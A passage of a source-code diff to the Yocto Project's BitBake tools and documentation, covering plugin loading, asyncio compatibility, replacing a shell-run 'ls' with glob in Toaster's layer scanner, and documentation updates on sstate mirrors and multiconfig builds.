1585 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) 1607 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
1586 if spec: 1608 if spec:
1587 return spec.loader.load_module() 1609 mod = importlib.util.module_from_spec(spec)
1610 spec.loader.exec_module(mod)
1611 return mod
1588 1612
1589 logger.debug(1, 'Loading plugins from %s...' % pluginpath) 1613 logger.debug(1, 'Loading plugins from %s...' % pluginpath)
1590 1614
diff --git a/bitbake/lib/bblayers/action.py b/bitbake/lib/bblayers/action.py
index d6459d6617..d2f9c1bbde 100644
--- a/bitbake/lib/bblayers/action.py
+++ b/bitbake/lib/bblayers/action.py
@@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin):
50 if not (args.force or notadded): 50 if not (args.force or notadded):
51 try: 51 try:
52 self.tinfoil.run_command('parseConfiguration') 52 self.tinfoil.run_command('parseConfiguration')
53 except bb.tinfoil.TinfoilUIException: 53 except (bb.tinfoil.TinfoilUIException, bb.BBHandledException):
54 # Restore the back up copy of bblayers.conf 54 # Restore the back up copy of bblayers.conf
55 shutil.copy2(backup, bblayers_conf) 55 shutil.copy2(backup, bblayers_conf)
56 bb.fatal("Parse failure with the specified layer added") 56 bb.fatal("Parse failure with the specified layer added, aborting.")
57 else: 57 else:
58 for item in notadded: 58 for item in notadded:
59 sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item) 59 sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item)
diff --git a/bitbake/lib/bblayers/layerindex.py b/bitbake/lib/bblayers/layerindex.py
index 95b67a6621..f64d18e819 100644
--- a/bitbake/lib/bblayers/layerindex.py
+++ b/bitbake/lib/bblayers/layerindex.py
@@ -206,6 +206,7 @@ class LayerIndexPlugin(ActionPlugin):
206""" 206"""
207 args.show_only = True 207 args.show_only = True
208 args.ignore = [] 208 args.ignore = []
209 args.shallow = True
209 self.do_layerindex_fetch(args) 210 self.do_layerindex_fetch(args)
210 211
211 def register_commands(self, sp): 212 def register_commands(self, sp):
diff --git a/bitbake/lib/bblayers/query.py b/bitbake/lib/bblayers/query.py
index e2cc310532..652a3acce0 100644
--- a/bitbake/lib/bblayers/query.py
+++ b/bitbake/lib/bblayers/query.py
@@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix.
150 def print_item(f, pn, ver, layer, ispref): 150 def print_item(f, pn, ver, layer, ispref):
151 if not selected_layer or layer == selected_layer: 151 if not selected_layer or layer == selected_layer:
152 if not bare and f in skiplist: 152 if not bare and f in skiplist:
153 skipped = ' (skipped)' 153 skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason
154 else: 154 else:
155 skipped = '' 155 skipped = ''
156 if show_filenames: 156 if show_filenames:
@@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies.
433 line = fnfile.readline() 433 line = fnfile.readline()
434 434
435 # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass 435 # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass
436 conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$") 436 conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$")
437 inc_re = re.compile(".*\.inc$") 437 inc_re = re.compile(r".*\.inc$")
438 # The "inherit xxx" in .bbclass 438 # The "inherit xxx" in .bbclass
439 bbclass_re = re.compile(".*\.bbclass$") 439 bbclass_re = re.compile(r".*\.bbclass$")
440 for layerdir in self.bblayers: 440 for layerdir in self.bblayers:
441 layername = self.get_layer_name(layerdir) 441 layername = self.get_layer_name(layerdir)
442 for dirpath, dirnames, filenames in os.walk(layerdir): 442 for dirpath, dirnames, filenames in os.walk(layerdir):
diff --git a/bitbake/lib/hashserv/server.py b/bitbake/lib/hashserv/server.py
index 81050715ea..f38a22ad92 100644
--- a/bitbake/lib/hashserv/server.py
+++ b/bitbake/lib/hashserv/server.py
@@ -12,6 +12,7 @@ import math
12import os 12import os
13import signal 13import signal
14import socket 14import socket
15import sys
15import time 16import time
16from . import chunkify, DEFAULT_MAX_CHUNK 17from . import chunkify, DEFAULT_MAX_CHUNK
17 18
@@ -419,9 +420,14 @@ class Server(object):
419 self._cleanup_socket = None 420 self._cleanup_socket = None
420 421
421 def start_tcp_server(self, host, port): 422 def start_tcp_server(self, host, port):
422 self.server = self.loop.run_until_complete( 423 if sys.version_info[0] == 3 and sys.version_info[1] < 6:
423 asyncio.start_server(self.handle_client, host, port, loop=self.loop) 424 self.server = self.loop.run_until_complete(
424 ) 425 asyncio.start_server(self.handle_client, host, port, loop=self.loop)
426 )
427 else:
428 self.server = self.loop.run_until_complete(
429 asyncio.start_server(self.handle_client, host, port)
430 )
425 431
426 for s in self.server.sockets: 432 for s in self.server.sockets:
427 logger.info('Listening on %r' % (s.getsockname(),)) 433 logger.info('Listening on %r' % (s.getsockname(),))
@@ -444,9 +450,14 @@ class Server(object):
444 try: 450 try:
445 # Work around path length limits in AF_UNIX 451 # Work around path length limits in AF_UNIX
446 os.chdir(os.path.dirname(path)) 452 os.chdir(os.path.dirname(path))
447 self.server = self.loop.run_until_complete( 453 if sys.version_info[0] == 3 and sys.version_info[1] < 6:
448 asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) 454 self.server = self.loop.run_until_complete(
449 ) 455 asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
456 )
457 else:
458 self.server = self.loop.run_until_complete(
459 asyncio.start_unix_server(self.handle_client, os.path.basename(path))
460 )
450 finally: 461 finally:
451 os.chdir(cwd) 462 os.chdir(cwd)
452 463
diff --git a/bitbake/lib/layerindexlib/__init__.py b/bitbake/lib/layerindexlib/__init__.py
index 77196b408f..f30ee9e259 100644
--- a/bitbake/lib/layerindexlib/__init__.py
+++ b/bitbake/lib/layerindexlib/__init__.py
@@ -6,7 +6,6 @@
6import datetime 6import datetime
7 7
8import logging 8import logging
9import imp
10 9
11from collections import OrderedDict 10from collections import OrderedDict
12from layerindexlib.plugin import LayerIndexPluginUrlError 11from layerindexlib.plugin import LayerIndexPluginUrlError
diff --git a/bitbake/lib/toaster/toastergui/api.py b/bitbake/lib/toaster/toastergui/api.py
index b4cdc335ef..e367bd910e 100644
--- a/bitbake/lib/toaster/toastergui/api.py
+++ b/bitbake/lib/toaster/toastergui/api.py
@@ -11,7 +11,7 @@ import os
11import re 11import re
12import logging 12import logging
13import json 13import json
14import subprocess 14import glob
15from collections import Counter 15from collections import Counter
16 16
17from orm.models import Project, ProjectTarget, Build, Layer_Version 17from orm.models import Project, ProjectTarget, Build, Layer_Version
@@ -227,20 +227,18 @@ class XhrSetDefaultImageUrl(View):
227# same logical name 227# same logical name
228# * Each project that uses a layer will have its own 228# * Each project that uses a layer will have its own
229# LayerVersion and Project Layer for it 229# LayerVersion and Project Layer for it
230# * During the Paroject delete process, when the last 230# * During the Project delete process, when the last
231# LayerVersion for a 'local_source_dir' layer is deleted 231# LayerVersion for a 'local_source_dir' layer is deleted
232# then the Layer record is deleted to remove orphans 232# then the Layer record is deleted to remove orphans
233# 233#
234 234
235def scan_layer_content(layer,layer_version): 235def scan_layer_content(layer,layer_version):
236 # if this is a local layer directory, we can immediately scan its content 236 # if this is a local layer directory, we can immediately scan its content
237 if layer.local_source_dir: 237 if os.path.isdir(layer.local_source_dir):
238 try: 238 try:
239 # recipes-*/*/*.bb 239 # recipes-*/*/*.bb
240 cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb')) 240 recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb'))
241 recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read() 241 for recipe in recipes_list:
242 recipes_list = recipes_list.decode("utf-8").strip()
243 if recipes_list and 'No such' not in recipes_list:
244 for recipe in recipes_list.split('\n'): 242 for recipe in recipes_list.split('\n'):
245 recipe_path = recipe[recipe.rfind('recipes-'):] 243 recipe_path = recipe[recipe.rfind('recipes-'):]
246 recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','') 244 recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','')
@@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version):
260 258
261 except Exception as e: 259 except Exception as e:
262 logger.warning("ERROR:scan_layer_content: %s" % e) 260 logger.warning("ERROR:scan_layer_content: %s" % e)
261 else:
262 logger.warning("ERROR: wrong path given")
263 raise KeyError("local_source_dir")
263 264
264class XhrLayer(View): 265class XhrLayer(View):
265 """ Delete, Get, Add and Update Layer information 266 """ Delete, Get, Add and Update Layer information
@@ -456,15 +457,18 @@ class XhrLayer(View):
456 'layerdetailurl': 457 'layerdetailurl':
457 layer_dep.get_detailspage_url(project.pk)}) 458 layer_dep.get_detailspage_url(project.pk)})
458 459
459 # Scan the layer's content and update components 460 # Only scan_layer_content if layer is local
460 scan_layer_content(layer,layer_version) 461 if layer_data.get('local_source_dir', None):
462 # Scan the layer's content and update components
463 scan_layer_content(layer,layer_version)
461 464
462 except Layer_Version.DoesNotExist: 465 except Layer_Version.DoesNotExist:
463 return error_response("layer-dep-not-found") 466 return error_response("layer-dep-not-found")
464 except Project.DoesNotExist: 467 except Project.DoesNotExist:
465 return error_response("project-not-found") 468 return error_response("project-not-found")
466 except KeyError: 469 except KeyError as e:
467 return error_response("incorrect-parameters") 470 _log("KeyError: %s" % e)
471 return error_response(f"incorrect-parameters")
468 472
469 return JsonResponse({'error': "ok", 473 return JsonResponse({'error': "ok",
470 'imported_layer': { 474 'imported_layer': {
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
index c9622d3647..6a44511af2 100644
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
+++ b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
@@ -222,19 +222,10 @@ an entire Linux distribution, including the toolchain, from source.
222 .. tip:: 222 .. tip::
223 223
224 You can significantly speed up your build and guard against fetcher 224 You can significantly speed up your build and guard against fetcher
225 failures by using mirrors. To use mirrors, add these lines to your 225 failures by using mirrors. To use mirrors, add this line to your
226 local.conf file in the Build directory: :: 226 ``local.conf`` file in the :term:`Build Directory`: ::
227 227
228 SSTATE_MIRRORS = "\ 228 SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
229 file://.* http://sstate.yoctoproject.org/dev/PATH;downloadfilename=PATH \n \
230 file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION_MINUS_ONE;/PATH;downloadfilename=PATH \n \
231 file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION;/PATH;downloadfilename=PATH \n \
232 "
233
234
235 The previous examples showed how to add sstate paths for Yocto Project
236 &YOCTO_DOC_VERSION_MINUS_ONE;, &YOCTO_DOC_VERSION;, and a development
237 area. For a complete index of sstate locations, see http://sstate.yoctoproject.org/.
238 229
239#. **Start the Build:** Continue with the following command to build an OS 230#. **Start the Build:** Continue with the following command to build an OS
240 image for the target, which is ``core-image-sato`` in this example: 231 image for the target, which is ``core-image-sato`` in this example:
diff --git a/documentation/bsp-guide/bsp.rst b/documentation/bsp-guide/bsp.rst
index d0275eea9a..efb5328911 100644
--- a/documentation/bsp-guide/bsp.rst
+++ b/documentation/bsp-guide/bsp.rst
@@ -166,8 +166,9 @@ section.
166#. *Determine the BSP Layer You Want:* The Yocto Project supports many 166#. *Determine the BSP Layer You Want:* The Yocto Project supports many
167 BSPs, which are maintained in their own layers or in layers designed 167 BSPs, which are maintained in their own layers or in layers designed
168 to contain several BSPs. To get an idea of machine support through 168 to contain several BSPs. To get an idea of machine support through
169 BSP layers, you can look at the `index of 169 BSP layers, you can look at the
170 machines <&YOCTO_RELEASE_DL_URL;/machines>`__ for the release. 170 :yocto_dl:`index of machines </releases/yocto/&DISTRO_REL_TAG;/machines>`
171 for the release.
171 172
172#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is 173#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is
173 based on current Intel CPUs and devices, you can leverage this BSP 174 based on current Intel CPUs and devices, you can leverage this BSP
diff --git a/documentation/conf.py b/documentation/conf.py
index c2e9801fd9..e9078e054e 100644
--- a/documentation/conf.py
+++ b/documentation/conf.py
@@ -15,8 +15,27 @@
15import os 15import os
16import sys 16import sys
17import datetime 17import datetime
18try:
19 import yaml
20except ImportError:
21 sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
22 \nPlease make sure to install pyyaml python package.\n")
23 sys.exit(1)
18 24
19current_version = "3.1.6" 25# current_version = "dev"
26# bitbake_version = "" # Leave empty for development branch
27# Obtain versions from poky.yaml instead
28with open("poky.yaml") as data:
29 buff = data.read()
30 subst_vars = yaml.safe_load(buff)
31 if "DOCCONF_VERSION" not in subst_vars:
32 sys.stderr.write("Please set DOCCONF_VERSION in poky.yaml")
33 sys.exit(1)
34 current_version = subst_vars["DOCCONF_VERSION"]
35 if "BITBAKE_SERIES" not in subst_vars:
36 sys.stderr.write("Please set BITBAKE_SERIES in poky.yaml")
37 sys.exit(1)
38 bitbake_version = subst_vars["BITBAKE_SERIES"]
20 39
21# String used in sidebar 40# String used in sidebar
22version = 'Version: ' + current_version 41version = 'Version: ' + current_version
@@ -78,11 +97,12 @@ extlinks = {
78 'yocto_git': ('https://git.yoctoproject.org%s', None), 97 'yocto_git': ('https://git.yoctoproject.org%s', None),
79 'oe_home': ('https://www.openembedded.org%s', None), 98 'oe_home': ('https://www.openembedded.org%s', None),
80 'oe_lists': ('https://lists.openembedded.org%s', None), 99 'oe_lists': ('https://lists.openembedded.org%s', None),
100 'oe_git': ('https://git.openembedded.org%s', None),
81} 101}
82 102
83# Intersphinx config to use cross reference with Bitbake user manual 103# Intersphinx config to use cross reference with Bitbake user manual
84intersphinx_mapping = { 104intersphinx_mapping = {
85 'bitbake': ('https://docs.yoctoproject.org/bitbake/1.46', None) 105 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None)
86} 106}
87 107
88# -- Options for HTML output ------------------------------------------------- 108# -- Options for HTML output -------------------------------------------------
diff --git a/documentation/dev-manual/dev-manual-common-tasks.rst b/documentation/dev-manual/dev-manual-common-tasks.rst
index d401d3b4ee..d1dde6d0f3 100644
--- a/documentation/dev-manual/dev-manual-common-tasks.rst
+++ b/documentation/dev-manual/dev-manual-common-tasks.rst
@@ -2168,7 +2168,7 @@ recipe, but which one? You can configure your build to call out the
2168kernel recipe you want by using the 2168kernel recipe you want by using the
2169:term:`PREFERRED_PROVIDER` 2169:term:`PREFERRED_PROVIDER`
2170variable. As an example, consider the 2170variable. As an example, consider the
2171`x86-base.inc <https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`_ 2171:yocto_git:`x86-base.inc </cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`
2172include file, which is a machine (i.e. 2172include file, which is a machine (i.e.
2173:term:`MACHINE`) configuration file. 2173:term:`MACHINE`) configuration file.
2174This include file is the reason all x86-based machines use the 2174This include file is the reason all x86-based machines use the
@@ -2628,7 +2628,7 @@ Recipe Syntax
2628Understanding recipe file syntax is important for writing recipes. The 2628Understanding recipe file syntax is important for writing recipes. The
2629following list overviews the basic items that make up a BitBake recipe 2629following list overviews the basic items that make up a BitBake recipe
2630file. For more complete BitBake syntax descriptions, see the 2630file. For more complete BitBake syntax descriptions, see the
2631":doc:`bitbake-user-manual/bitbake-user-manual-metadata`" 2631":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`"
2632chapter of the BitBake User Manual. 2632chapter of the BitBake User Manual.
2633 2633
2634- *Variable Assignments and Manipulations:* Variable assignments allow 2634- *Variable Assignments and Manipulations:* Variable assignments allow
@@ -3854,7 +3854,7 @@ Setting Up and Running a Multiple Configuration Build
3854 3854
3855To accomplish a multiple configuration build, you must define each 3855To accomplish a multiple configuration build, you must define each
3856target's configuration separately using a parallel configuration file in 3856target's configuration separately using a parallel configuration file in
3857the :term:`Build Directory`, and you 3857the :term:`Build Directory` or configuration directory within a layer, and you
3858must follow a required file hierarchy. Additionally, you must enable the 3858must follow a required file hierarchy. Additionally, you must enable the
3859multiple configuration builds in your ``local.conf`` file. 3859multiple configuration builds in your ``local.conf`` file.
3860 3860
@@ -3862,47 +3862,47 @@ Follow these steps to set up and execute multiple configuration builds:
3862 3862
3863- *Create Separate Configuration Files*: You need to create a single 3863- *Create Separate Configuration Files*: You need to create a single
3864 configuration file for each build target (each multiconfig). 3864 configuration file for each build target (each multiconfig).
3865 Minimally, each configuration file must define the machine and the 3865 The configuration definitions are implementation dependent but often
3866 temporary directory BitBake uses for the build. Suggested practice 3866 each configuration file will define the machine and the
3867 dictates that you do not overlap the temporary directories used 3867 temporary directory BitBake uses for the build. Whether the same
3868 during the builds. However, it is possible that you can share the 3868 temporary directory (:term:`TMPDIR`) can be shared will depend on what is
3869 temporary directory 3869 similar and what is different between the configurations. Multiple MACHINE
3870 (:term:`TMPDIR`). For example, 3870 targets can share the same (:term:`TMPDIR`) as long as the rest of the
3871 consider a scenario with two different multiconfigs for the same 3871 configuration is the same, multiple DISTRO settings would need separate
3872 (:term:`TMPDIR`) directories.
3873
3874 For example, consider a scenario with two different multiconfigs for the same
3872 :term:`MACHINE`: "qemux86" built 3875 :term:`MACHINE`: "qemux86" built
3873 for two distributions such as "poky" and "poky-lsb". In this case, 3876 for two distributions such as "poky" and "poky-lsb". In this case,
3874 you might want to use the same ``TMPDIR``. 3877 you would need to use the different :term:`TMPDIR`.
3875 3878
3876 Here is an example showing the minimal statements needed in a 3879 Here is an example showing the minimal statements needed in a
3877 configuration file for a "qemux86" target whose temporary build 3880 configuration file for a "qemux86" target whose temporary build
3878 directory is ``tmpmultix86``: 3881 directory is ``tmpmultix86``::
3879 ::
3880 3882
3881 MACHINE = "qemux86" 3883 MACHINE = "qemux86"
3882 TMPDIR = "${TOPDIR}/tmpmultix86" 3884 TMPDIR = "${TOPDIR}/tmpmultix86"
3883 3885
3884 The location for these multiconfig configuration files is specific. 3886 The location for these multiconfig configuration files is specific.
3885 They must reside in the current build directory in a sub-directory of 3887 They must reside in the current :term:`Build Directory` in a sub-directory of
3886 ``conf`` named ``multiconfig``. Following is an example that defines 3888 ``conf`` named ``multiconfig`` or within a layer's ``conf`` directory
3889 under a directory named ``multiconfig``. Following is an example that defines
3887 two configuration files for the "x86" and "arm" multiconfigs: 3890 two configuration files for the "x86" and "arm" multiconfigs:
3888 3891
3889 .. image:: figures/multiconfig_files.png 3892 .. image:: figures/multiconfig_files.png
3890 :align: center 3893 :align: center
3894 :width: 50%
3891 3895
3892 The reason for this required file hierarchy is because the ``BBPATH`` 3896 The usual :term:`BBPATH` search path is used to locate multiconfig files in
3893 variable is not constructed until the layers are parsed. 3897 a similar way to other conf files.
3894 Consequently, using the configuration file as a pre-configuration
3895 file is not possible unless it is located in the current working
3896 directory.
3897 3898
3898- *Add the BitBake Multi-configuration Variable to the Local 3899- *Add the BitBake Multi-configuration Variable to the Local
3899 Configuration File*: Use the 3900 Configuration File*: Use the
3900 :term:`BBMULTICONFIG` 3901 :term:`BBMULTICONFIG`
3901 variable in your ``conf/local.conf`` configuration file to specify 3902 variable in your ``conf/local.conf`` configuration file to specify
3902 each multiconfig. Continuing with the example from the previous 3903 each multiconfig. Continuing with the example from the previous
3903 figure, the ``BBMULTICONFIG`` variable needs to enable two 3904 figure, the :term:`BBMULTICONFIG` variable needs to enable two
3904 multiconfigs: "x86" and "arm" by specifying each configuration file: 3905 multiconfigs: "x86" and "arm" by specifying each configuration file::
3905 ::
3906 3906
3907 BBMULTICONFIG = "x86 arm" 3907 BBMULTICONFIG = "x86 arm"
3908 3908
@@ -3916,13 +3916,11 @@ Follow these steps to set up and execute multiple configuration builds:
3916 with "". 3916 with "".
3917 3917
3918- *Launch BitBake*: Use the following BitBake command form to launch 3918- *Launch BitBake*: Use the following BitBake command form to launch
3919 the multiple configuration build: 3919 the multiple configuration build::
3920 ::
3921 3920
3922 $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ] 3921 $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
3923 3922
3924 For the example in this section, the following command applies: 3923 For the example in this section, the following command applies::
3925 ::
3926 3924
3927 $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base 3925 $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
3928 3926
@@ -3937,7 +3935,7 @@ Follow these steps to set up and execute multiple configuration builds:
3937 Support for multiple configuration builds in the Yocto Project &DISTRO; 3935 Support for multiple configuration builds in the Yocto Project &DISTRO;
3938 (&DISTRO_NAME;) Release does not include Shared State (sstate) 3936 (&DISTRO_NAME;) Release does not include Shared State (sstate)
3939 optimizations. Consequently, if a build uses the same object twice 3937 optimizations. Consequently, if a build uses the same object twice
3940 in, for example, two different ``TMPDIR`` 3938 in, for example, two different :term:`TMPDIR`
3941 directories, the build either loads from an existing sstate cache for 3939 directories, the build either loads from an existing sstate cache for
3942 that build at the start or builds the object fresh. 3940 that build at the start or builds the object fresh.
3943 3941
@@ -3958,38 +3956,34 @@ essentially that the
3958 3956
3959To enable dependencies in a multiple configuration build, you must 3957To enable dependencies in a multiple configuration build, you must
3960declare the dependencies in the recipe using the following statement 3958declare the dependencies in the recipe using the following statement
3961form: 3959form::
3962::
3963 3960
3964 task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend" 3961 task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
3965 3962
3966To better show how to use this statement, consider the example scenario 3963To better show how to use this statement, consider the example scenario
3967from the first paragraph of this section. The following statement needs 3964from the first paragraph of this section. The following statement needs
3968to be added to the recipe that builds the ``core-image-sato`` image: 3965to be added to the recipe that builds the ``core-image-sato`` image::
3969::
3970 3966
3971 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs" 3967 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
3972 3968
3973In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The 3969In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The
3974task on which the ``do_image`` task in the recipe depends is the 3970task on which the :ref:`ref-tasks-image` task in the recipe depends is the
3975``do_rootfs`` task from the ``core-image-minimal`` recipe associated 3971:ref:`ref-tasks-rootfs` task from the ``core-image-minimal`` recipe associated
3976with the "arm" multiconfig. 3972with the "arm" multiconfig.
3977 3973
3978Once you set up this dependency, you can build the "x86" multiconfig 3974Once you set up this dependency, you can build the "x86" multiconfig
3979using a BitBake command as follows: 3975using a BitBake command as follows::
3980::
3981 3976
3982 $ bitbake mc:x86:core-image-sato 3977 $ bitbake mc:x86:core-image-sato
3983 3978
3984This command executes all the tasks needed to create the 3979This command executes all the tasks needed to create the
3985``core-image-sato`` image for the "x86" multiconfig. Because of the 3980``core-image-sato`` image for the "x86" multiconfig. Because of the
3986dependency, BitBake also executes through the ``do_rootfs`` task for the 3981dependency, BitBake also executes through the :ref:`ref-tasks-rootfs` task for the
3987"arm" multiconfig build. 3982"arm" multiconfig build.
3988 3983
3989Having a recipe depend on the root filesystem of another build might not 3984Having a recipe depend on the root filesystem of another build might not
3990seem that useful. Consider this change to the statement in the 3985seem that useful. Consider this change to the statement in the
3991``core-image-sato`` recipe: 3986``core-image-sato`` recipe::
3992::
3993 3987
3994 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image" 3988 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
3995 3989
@@ -4967,7 +4961,7 @@ configuration would be as follows:
4967 require conf/multilib.conf 4961 require conf/multilib.conf
4968 MULTILIBS = "multilib:lib32" 4962 MULTILIBS = "multilib:lib32"
4969 DEFAULTTUNE_virtclass-multilib-lib32 = "x86" 4963 DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
4970 IMAGE_INSTALL_append = "lib32-glib-2.0" 4964 IMAGE_INSTALL_append = " lib32-glib-2.0"
4971 4965
4972This example enables an additional library named 4966This example enables an additional library named
4973``lib32`` alongside the normal target packages. When combining these 4967``lib32`` alongside the normal target packages. When combining these
@@ -8658,6 +8652,8 @@ In order to run tests, you need to do the following:
8658 - Be sure to use an absolute path when calling this script 8652 - Be sure to use an absolute path when calling this script
8659 with sudo. 8653 with sudo.
8660 8654
8655 - Ensure that your host has the package ``iptables`` installed.
8656
8661 - The package recipe ``qemu-helper-native`` is required to run 8657 - The package recipe ``qemu-helper-native`` is required to run
8662 this script. Build the package using the following command: 8658 this script. Build the package using the following command:
8663 :: 8659 ::
diff --git a/documentation/dev-manual/dev-manual-start.rst b/documentation/dev-manual/dev-manual-start.rst
index a85b86fbfb..6a330d4a32 100644
--- a/documentation/dev-manual/dev-manual-start.rst
+++ b/documentation/dev-manual/dev-manual-start.rst
@@ -659,7 +659,7 @@ Follow these steps to locate and download a particular tarball:
659Using the Downloads Page 659Using the Downloads Page
660------------------------ 660------------------------
661 661
662The :yocto_home:`Yocto Project Website <>` uses a "DOWNLOADS" page 662The :yocto_home:`Yocto Project Website <>` uses a "RELEASES" page
663from which you can locate and download tarballs of any Yocto Project 663from which you can locate and download tarballs of any Yocto Project
664release. Rather than Git repositories, these files represent snapshot 664release. Rather than Git repositories, these files represent snapshot
665tarballs similar to the tarballs located in the Index of Releases 665tarballs similar to the tarballs located in the Index of Releases
@@ -676,12 +676,13 @@ Releases <#accessing-index-of-releases>`__" section.
6761. *Go to the Yocto Project Website:* Open The 6761. *Go to the Yocto Project Website:* Open The
677 :yocto_home:`Yocto Project Website <>` in your browser. 677 :yocto_home:`Yocto Project Website <>` in your browser.
678 678
6792. *Get to the Downloads Area:* Select the "DOWNLOADS" item from the 679#. *Get to the Downloads Area:* Select the "RELEASES" item from the
680 pull-down "SOFTWARE" tab menu near the top of the page. 680 pull-down "DEVELOPMENT" tab menu near the top of the page.
681 681
6823. *Select a Yocto Project Release:* Use the menu next to "RELEASE" to 682#. *Select a Yocto Project Release:* On the top of the "RELEASE" page currently
683 display and choose a recent or past supported Yocto Project release 683 supported releases are displayed, further down past supported Yocto Project
684 (e.g. &DISTRO_NAME_NO_CAP;, &DISTRO_NAME_NO_CAP_MINUS_ONE;, and so forth). 684 releases are visible. The "Download" links in the rows of the table there
685 will lead to the download tarballs for the release.
685 686
686 .. note:: 687 .. note::
687 688
@@ -691,9 +692,9 @@ Releases <#accessing-index-of-releases>`__" section.
691 You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto 692 You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto
692 Project releases. 693 Project releases.
693 694
6944. *Download Tools or Board Support Packages (BSPs):* From the 695#. *Download Tools or Board Support Packages (BSPs):* Next to the tarballs you
695 "DOWNLOADS" page, you can download tools or BSPs as well. Just scroll 696 will find download tools or BSPs as well. Just select a Yocto Project
696 down the page and look for what you need. 697 release and look for what you need.
697 698
698Accessing Nightly Builds 699Accessing Nightly Builds
699------------------------ 700------------------------
diff --git a/documentation/kernel-dev/kernel-dev-common.rst b/documentation/kernel-dev/kernel-dev-common.rst
index 830b3e88ca..6b5e9484d0 100644
--- a/documentation/kernel-dev/kernel-dev-common.rst
+++ b/documentation/kernel-dev/kernel-dev-common.rst
@@ -1100,7 +1100,7 @@ Section.
1100 :: 1100 ::
1101 1101
1102 FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:" 1102 FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
1103 SRC_URI_append = "file://0001-calibrate.c-Added-some-printk-statements.patch" 1103 SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
1104 1104
1105 The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements 1105 The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
1106 enable the OpenEmbedded build system to find the patch file. 1106 enable the OpenEmbedded build system to find the patch file.
diff --git a/documentation/overview-manual/overview-manual-concepts.rst b/documentation/overview-manual/overview-manual-concepts.rst
index d9f50e5194..3401f534b1 100644
--- a/documentation/overview-manual/overview-manual-concepts.rst
+++ b/documentation/overview-manual/overview-manual-concepts.rst
@@ -1986,9 +1986,7 @@ Behind the scenes, the shared state code works by looking in
1986shared state files. Here is an example: 1986shared state files. Here is an example:
1987:: 1987::
1988 1988
1989 SSTATE_MIRRORS ?= "\ 1989 SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
1990 file://.\* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
1991 file://.\* file:///some/local/dir/sstate/PATH"
1992 1990
1993.. note:: 1991.. note::
1994 1992
diff --git a/documentation/overview-manual/overview-manual-development-environment.rst b/documentation/overview-manual/overview-manual-development-environment.rst
index 4bedd6df67..a5469d4d78 100644
--- a/documentation/overview-manual/overview-manual-development-environment.rst
+++ b/documentation/overview-manual/overview-manual-development-environment.rst
@@ -422,7 +422,7 @@ files. Git uses "branches" to organize different development efforts.
422For example, the ``poky`` repository has several branches that include 422For example, the ``poky`` repository has several branches that include
423the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many 423the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many
424branches for past Yocto Project releases. You can see all the branches 424branches for past Yocto Project releases. You can see all the branches
425by going to https://git.yoctoproject.org/cgit.cgi/poky/ and clicking on the 425by going to :yocto_git:`/cgit.cgi/poky/` and clicking on the
426``[...]`` link beneath the "Branch" heading. 426``[...]`` link beneath the "Branch" heading.
427 427
428Each of these branches represents a specific area of development. The 428Each of these branches represents a specific area of development. The
